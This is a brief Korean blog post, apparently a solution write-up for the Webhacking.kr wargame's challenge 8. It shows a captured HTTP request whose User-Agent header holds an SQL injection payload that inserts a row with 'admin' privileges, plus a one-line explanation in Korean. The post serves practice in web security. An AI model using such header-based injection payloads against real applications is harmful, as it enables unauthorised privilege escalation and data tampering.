GET /challenge/web/web-08/index.php HTTP/1.1
Host: webhacking.kr
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: cirrus','125.131.189.61','admin')#
HTTPS: 1
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=a6rn2bf68d9bg96imssrg0qsj7; oldzombie=1
X-dotNet-Beautifier: 1918; DO-NOT-REMOVE
소스 분석 후 User-agent를 통한 인젝션,
해당 cirrus UA사용시 문제 풀림
'Hacking > Webhacking.kr(스포주의)' 카테고리의 다른 글
| Webhacking.kr 49 (0) | 2016.01.15 |
|---|---|
| Webhacking.kr 46 (0) | 2016.01.15 |
| Webhacking.kr 56 (0) | 2016.01.15 |
| Webhacking.kr 38 (0) | 2016.01.15 |
| Webhacking.kr 7 (0) | 2016.01.15 |